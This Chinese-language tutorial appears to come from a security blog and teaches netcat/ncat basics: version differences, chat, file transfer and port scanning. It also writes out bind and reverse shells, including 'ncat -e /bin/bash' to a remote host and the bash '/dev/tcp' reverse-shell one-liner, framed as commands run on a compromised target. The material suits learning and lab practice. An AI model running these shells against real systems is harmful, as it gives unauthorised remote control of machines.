nc被誉为网络安全界的瑞士军刀，一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据，国光本人认为看完这篇文章教程你的nc基本上是入门了。

简介

nc被誉为网络安全界的瑞士军刀，一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。

版本区别

nc的版本非常乱，有很多版本，他们分别由不同的作者编写。

netcat-traditional

这个是最早的版本，最新版本是2007年1月，版本是1.10，Kali Linux默认带的就是这个版本：

root@kali-linux:~# nc -h
[v1.10-41.1]

这个版本的nc具有-e选项，十分方便反弹shell使用

Windows版本的netcat下载地址：https://eternallybored.org/misc/netcat/

netcat-openbsd

ubuntu里默认的nc命令指向的是netcat-openbsd。这个版本因为考虑到安全性等原因没有-e选项。所以我们得手动替换一下nc的版本：

# 安装传统的netcat
$ sudo apt-get install netcat

# 切换版本
$ sudo update-alternatives --config nc
[sudo] sqlsec 的密码： 
有 2 个候选项可用于替换 nc (提供 /bin/nc)。

  选择       路径               优先级  状态
------------------------------------------------------------
  0            /bin/nc.openbsd       50        自动模式
  1            /bin/nc.openbsd       50        手动模式
* 2            /bin/nc.traditional   10        手动模式

要维持当前值[*]请按<回车键>，或者键入选择的编号：2

ncat

这是netcat的比较新的现代版本，它是从头开始编写的，不使用原始的netcat代码。ncat的作者是着名的Nmap程序的作者。ncat几乎重复了原始程序的所有功能，并包含其他功能。CentOS、Red Hat默认带的是ncat。目前ncat已经集成到了nmap里面，安装完nmap后就可以使用ncat命令了。

用法

本用法全部基于ncat命令来做的记录，其他版本的nc可能会有些许差别。

实验环境

操作系统	IP地址
Ubuntu 18.04	10.211.55.14
macOS 10.13.6	10.211.55.2

文字交互

监听入站连接

-l：使用监听模式，监控传入的信息

# sqlsec @ X1cT34m-iMac in ~ 
$ ncat -l 2333

此刻macOS就会在监听本地2333端口的入站连接。

连接远程系统

尝试实验nc在Ubuntu系统下来连接macOS的2333端口：

# sqlsec @ ubuntu in ~ 
$ ncat 10.211.55.2 2333

现在就可以通过nc来聊天来，任何一方输入的内容都会被另一方看到：

任一方按Ctrl+C即可终止这尴尬的聊天。

命令交互

基本交互

-e：将传入的信息以命令执行

在macOS上运行如下命令，将/bin/bash通过2333端口来监听，将收到的信息都发送到/bin/bash

# sqlsec @ X1cT34m-iMac in ~ [22:09:34]
$ ncat -l -e /bin/bash 2333

Ubuntu系统这边依然向往常一样来连接macOS的2333端口，只是此时Ubutnu输入的指令都会传入macOS的/bin/bash 执行成功后会返回信息，类似于ssh操作连接来macOS一样：

# sqlsec @ ubuntu in ~ [22:13:49] C:130
$ ncat 10.211.55.2 2333
whoami
sqlsec
pwd
/Users/sqlsec
id
uid=501(sqlsec) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserver
adm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.a
ccess_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)
uname -a
Darwin X1cT34m-iMac 17.7.0 Darwin Kernel Version 17.7.0: Wed Apr 24 21:17:24 PDT 2019; root:xnu-4570.71.45~1/RELEASE_X86_64 x86_64

持久监听

-k: 客户端断掉连接时，服务端依然保持运行
-v：现实指令执行过程细节

在macOS开启一个持久监听的nc

# sqlsec @ X1cT34m-iMac in ~ 
$ ncat -lvk -e  /bin/bash 2333

此时使用Ubuntu去连接macOS:

# sqlsec @ ubuntu in ~ 
$ ncat 10.211.55.2 2333

当Ubuntu客户端使用CTRL + c或CTRL + d断开连接的时候，macOS的ncat依然在运行，这样方便Ubuntu下次直接nc连进来。

内网弹shell

ncat简单调整是可以穿内网的

操作系统	IP地址
macOS 10.13.6	内网
CentOS	www.sqlsec.com

首先外网的CentOS服务器先监听本地端口：

-w: 设置等待连线的时间秒数

# root @ x1ct34m in ~ 
$ ncat -lv 2333        
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::2333
Ncat: Listening on 0.0.0.0:2333

内网的macOS运行：

# sqlsec @ X1cT34m-iMac in ~
$ ncat -w 10 -e /bin/bash www.sqlsec.com 2333

此时CentOS这边已经接受到了内网到macOS的bash了，可以交互执行masOS的命令：

bash弹shell

如果控制的目标机器自带的nc不支持-e选项，那如何将shell弹出去呢？这里可以利用自带的bash命令交互环境来实现这个操作：

攻击者外网监听：

-p port 本地端口

# 使用nc命令的话得添加 -p 指定端口这个选项
nc -lvp 2333

# ncat用法不变
ncat -lv 2333

被入侵的目标机器执行如下命令：

bash -i >& /dev/tcp/10.211.55.4/2333 0>&1

这条命令的作用等同于之前的ncat -w 10 -e /bin/bash 10.211.55.4 2333

命令	参数解释
bash -i	产生一个bash交互环境
>&	将联合符号前面的内容与后面结合然后一起重定向给后者
/dev/tcp/10.211.55.4/2333	让目标主机与主机10.211.55.4的2333端口简历一个连接
0>&1	将标准的输入与标准输出内容相结合，然后重定向给前面的标准输出内容

文件传输

操作系统	IP地址
macOS 10.13.6	内网
CentOS	www.sqlsec.com

上传文件到远程

CentOS远程服务器运行：

# root @ x1ct34m in ~ 
$ ncat -l 2333 > hello.txt

macOS本地运行：

# sqlsec @ X1cT34m-iMac in ~
$ ncat www.sqlsec.com 2333 < hello.txt

此时会将macOS的文件传输到远程的CentOS服务器上，传输完成后，两个ncat会话都将终止。

从远程下载文件

CentOS远程服务器运行：

ct34m in ~
$ ncat -l 2333 < hello.txt

macOS本地运行：

# sqlsec @ X1cT34m-iMac in ~
$ ncat www.sqlsec.com 2333 > hello.txt

请注意，这里文件传输完成后不会显示任何内容，并且两个Ncat实例将继续工作。

端口扫描

范围扫描

ncat不支持端口扫描，但是原始的nc可以扫描端口。

-n: 直接使用ip地址，而不通过域名服务器
-z: 使用0输入/输出模式，只在扫描通信端口时使用

这里扫描10.211.55.14的20-25这个端口范围：

# sqlsec @ X1cT34m-iMac in ~
$ nc -v -n -z 10.211.55.14 20-25
10.211.55.14 22 (ssh) open

可以发现成功扫描出22端口是开放的了

单个扫描

# sqlsec @ X1cT34m-iMac in ~
$ nc -v -z -n 10.211.55.14 22 
10.211.55.14 22 (ssh) open

nc的命令可以写在一起的，下面两条命令的作用相同：

$ nc -v -z -n 10.211.55.14 22 
$ nc -vzn 10.211.55.14 22

详细参数

Plain

Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
  -4                         Use IPv4 only
  -6                         Use IPv6 only
  -U, --unixsock             Use Unix domain sockets only
  -C, --crlf                 Use CRLF for EOL sequence
  -c, --sh-exec     Executes the given command via /bin/sh
  -e, --exec        Executes the given command
      --lua-exec   Executes the given Lua script
  -g hop1[,hop2,...]         Loose source routing hop points (8 max)
  -G                      Loose source routing hop pointer (4, 8, 12, ...)
  -m, --max-conns         Maximum  simultaneous connections
  -h, --help                 Display this help screen
  -d, --delay          Wait between read/writes
  -o, --output     Dump session data to a file
  -x, --hex-dump   Dump session data as hex to a file
  -i, --idle-timeout   Idle read/write timeout
  -p, --source-port port     Specify source port to use
  -s, --source addr          Specify source address to use (doesn't affect -l)
  -l, --listen               Bind and listen for incoming connections
  -k, --keep-open            Accept multiple connections in listen mode
  -n, --nodns                Do not resolve hostnames via DNS
  -t, --telnet               Answer Telnet negotiations
  -u, --udp                  Use UDP instead of default TCP
      --sctp                 Use SCTP instead of default TCP
  -v, --verbose              Set verbosity level (can be used several times)
  -w, --wait           Connect timeout
  -z                         Zero-I/O mode, report connection status only
      --append-output        Append rather than clobber specified output files
      --send-only            Only send data, ignoring received; quit on EOF
      --recv-only            Only receive data, never send anything
      --allow                Allow only given hosts to connect to Ncat
      --allowfile            A file of hosts allowed to connect to Ncat
      --deny                 Deny given hosts from connecting to Ncat
      --denyfile             A file of hosts denied from connecting to Ncat
      --broker               Enable Ncat's connection brokering mode
      --chat                 Start a simple Ncat chat server
      --proxy <addr[:port]>  Specify address of host to proxy through
      --proxy-type     Specify proxy type ("http" or "socks4" or "socks5")
      --proxy-auth     Authenticate with HTTP or SOCKS proxy server
      --ssl                  Connect or listen with SSL
      --ssl-cert             Specify SSL certificate file (PEM) for listening
      --ssl-key              Specify SSL private key (PEM) for listening
      --ssl-verify           Verify trust and domain name of certificates
      --ssl-trustfile        PEM file containing trusted SSL certificates
      --ssl-ciphers          Cipherlist containing SSL ciphers to use
      --ssl-alpn             ALPN protocol list to use.
      --version              Display Ncat's version information and exit

See the ncat(1) manpage for full options, descriptions and usage examples</addr[:port]>

netcat基本命令指南

简介

版本区别

netcat-traditional

netcat-openbsd

ncat

用法

实验环境

文字交互

命令交互

基本交互

持久监听

内网弹shell

bash弹shell

文件传输

上传文件到远程

从远程下载文件

端口扫描

范围扫描

单个扫描

详细参数

hush

相关推荐

热门文章

热门搜索

seo超级工具

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

关注微信公众号：themebetter
复制微信号

回顶部

简介

版本区别

netcat-traditional

netcat-openbsd

ncat

用法

实验环境

文字交互

命令交互

基本交互

持久监听

内网弹shell

bash弹shell

文件传输

上传文件到远程

从远程下载文件

端口扫描

范围扫描

单个扫描

详细参数

hush

相关推荐

热门文章

热门搜索

seo超级工具

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

关注微信公众号：themebetter复制微信号

回顶部

关注微信公众号：themebetter
复制微信号